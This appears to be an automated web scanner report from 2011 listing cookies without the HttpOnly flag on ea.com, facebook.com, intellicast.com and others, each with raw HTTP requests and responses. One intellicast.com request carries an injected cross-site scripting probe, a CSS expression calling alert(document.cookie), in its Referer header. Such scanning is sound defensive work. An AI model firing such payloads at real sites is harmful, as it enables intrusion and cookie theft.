The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ipad HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:44 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=27lnus2ntqriv5k00j2k40ng93; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 61969
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=18e0qmhkmneofnmkng5qlhs1k4; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /iphone HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:42 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=18e0qmhkmneofnmkng5qlhs1k4; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 74885
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=3f7u6pkb5ng23ddteumgngbv25; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mobile HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:47 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=3f7u6pkb5ng23ddteumgngbv25; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 71803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=jbq0ai9k9l5t598m4of0l22c32; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /platform/online-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:33 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=jbq0ai9k9l5t598m4of0l22c32; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 68051
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=402g5cpkl5kqg8i27g71bepsl4; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /platform/pc-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:31 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=402g5cpkl5kqg8i27g71bepsl4; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 84317
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=4l4p40mas0vbdpd6hs2fi6r4h4; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /platform/ps3-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:40 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=4l4p40mas0vbdpd6hs2fi6r4h4; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 84808
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=50refd00geb05if67umc20au74; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /platform/xbox-360-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:34 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=50refd00geb05if67umc20au74; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 84273
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=4vsvrj360p5moup45jahp1d1l2; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wii HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:41 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=4vsvrj360p5moup45jahp1d1l2; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 71158
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=BqNeE; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 29867
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=zoSHS; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=zoSHS; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:15 GMT Content-Length: 11443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=DGAoC; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Pogo HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=DGAoC; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:26 GMT Content-Length: 29798
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=8aDVi; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/?sk=events P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=8aDVi; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:48 GMT Content-Length: 0
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=77KNI; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /logout.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=77KNI; path=/; domain=.facebook.com Set-Cookie: roadblock=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:18:12 GMT Content-Length: 0
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=VcqBg; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/Packet-Storm-Security/116613458352817 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=VcqBg; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 27755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=WrbZx; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /peanutlabs HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=WrbZx; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:43 GMT Content-Length: 130584
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=4KsQr; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitetour/connect.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/instantpersonalization/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=4KsQr; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:17:22 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /login.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; expires=Tue, 08-Jan-2013 05:27:42 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=tJ98F; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:27:42 GMT Content-Length: 16799
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00_Head1"><title> In ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Local/Weather.aspx?location=USMI0020 HTTP/1.1 Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00_Head1"><title> In ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Travel/CheapFlightsWidget.htm HTTP/1.1 Host: www.intellicast.com Proxy-Connection: keep-alive Referer: http://www.intellicast.com/Local/Weather.aspx?location=USMI0020&54ef9%22style%3d%22x%3aexpression(alert(document.cookie))%2223d5246f6f3=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=42rfba55zy50y245eamzjj2q; CityId=USMI0020; RecentLocations=Alma, Michigan@USMI0020:; Pop=0; vw=1; NSC_jdbtu_efgbvmu_iuuq_wt=44113c293660
Response
HTTP/1.1 200 OK Cache-Control: max-age=86400 Content-Type: text/html Content-Location: http://www.intellicast.com/Travel/CheapFlightsWidget.htm Expires: Wed, 01 Jan 1997 12:00:00 GMT Last-Modified: Mon, 15 Feb 2010 17:02:20 GMT Accept-Ranges: bytes ETag: "0f681a260aeca1:d07" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sun, 09 Jan 2011 01:46:02 GMT nnCoection: close Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt=44113c293660;expires=Sun, 09-Jan-11 02:12:11 GMT;path=/ Content-Length: 9446
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Intellicast ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
mt_imp=54267db83a49b89cd0644d669488302a; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:13:49 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a; path=/ Location: http://www.yourpurecrushes.com/hv1/blender_redirect.php?web_id=CD1&&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The following cookie was issued by the application and does not have the HttpOnly flag set:
mt_imp=54267db83a49b89cd0644d669488302a; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:13:59 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a; path=/ Location: http://www.yourpurecrushes.com/hv1/blender_redirect.php?web_id=CD1&&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The following cookie was issued by the application and does not have the HttpOnly flag set:
mt_imp=54267db83a49b89cd0644d669488302a; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:14:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a; path=/ Location: http://www.socialtrack.net/click.track?CID=121402&AFID=73472&ADID=297792&SUBID=CD1 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
